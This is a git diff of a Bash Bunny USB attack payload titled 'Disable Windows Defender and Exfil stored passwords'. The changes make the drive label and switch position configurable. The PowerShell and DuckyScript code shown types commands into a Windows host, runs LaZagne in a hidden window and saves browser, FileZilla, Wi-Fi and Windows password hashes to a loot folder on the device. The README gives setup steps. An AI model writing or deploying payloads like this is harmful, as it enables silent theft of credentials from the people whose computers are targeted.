Compare commits

...

2 Commits

Author SHA1 Message Date
Rafa Guillermo 774cc77212 fix shell.bat again 2024-09-30 13:15:25 +02:00
Rafa Guillermo 5da19abe97 updated payload to make drive label and switch generic 2024-09-30 13:14:28 +02:00
3 changed files with 11 additions and 11 deletions

View File

@ -1,4 +1,5 @@
$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber') $drivelabel = 'BashBunny'
$dest = ((Get-WmiObject win32_volume -f 'label=''$drivelabel''').Name+'loot\PasswordGrabber')
$filter = 'password_'+ $env:COMPUTERNAME $filter = 'password_'+ $env:COMPUTERNAME
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tooling\LaZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')

View File

@ -2,16 +2,13 @@
# #
# Title: Disable Windows Defender and Exfil stored passwords # Title: Disable Windows Defender and Exfil stored passwords
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... # Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
# Disables Windows defender and runs LaZagne to grab passwords from the host system from apps like: # This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
# chrome, internet explorer, firefox, filezilla and more. Wifi passwords and Win password hashes included. # This payload makes use of AleZssandroZ awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
# This payload is quick, but opens up an ugly PS terminal which can probably be obfuscated. This payload
# springboards off of AleZssandroZ's LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
#
# Author: rafa-guillermo # Author: rafa-guillermo
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz # Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
# Version: 1.0 # Version: 1.2
# Category: Credentials # Category: Credentials
# Target: Windows 11 # Target: Windows
# Tested On: Windows 11 # Tested On: Windows 11
# Attackmodes: HID, STORAGE # Attackmodes: HID, STORAGE
@ -22,6 +19,7 @@ LOOTDIR=/root/udisk/loot/PasswordGrabber
LED SETUP LED SETUP
GET SWITCH_POSITION GET SWITCH_POSITION
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
DRIVE_LABEL=BashBunny
######## Make Loot Dir ######## ######## Make Loot Dir ########
# Setup named logs in loot directory # Setup named logs in loot directory
@ -53,9 +51,9 @@ sleep 1
# Run laZagne # Run laZagne
LED STAGE2 LED STAGE2
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='BashBunny'\" | Select-Object -ExpandProperty DriveLetter)" QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
QUACK ENTER QUACK ENTER
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\switch1\\payload.ps1\"" QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
QUACK ENTER QUACK ENTER
QUACK STRING \& \$scriptPath QUACK STRING \& \$scriptPath
QUACK ENTER QUACK ENTER

View File

@ -16,7 +16,8 @@ Password grabber: [Also in this repo](https://github.com/hak5/bashbunny-payloads
## Configuration ## Configuration
1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too. 1. You need to download LaZagne from the [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases). Tested with LaZagne 2.2 but might work with newer versions too.
2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling. 2. Unzip the exe file and place it in the folder called 'tooling' on the root of the Bash Bunny. The payload folder should contain payload.ps1 and payload.txt, LaZagne.exe needs to be in a folder called tooling.
3. Plug your BashBunny and Enjoy 3. Set up your Bash Bunny Drive Label (default is BashBunny, config is on line 22 of payload.txt and line 1 of payload.ps1)
4. Plug your BashBunny and Enjoy
## Info ## Info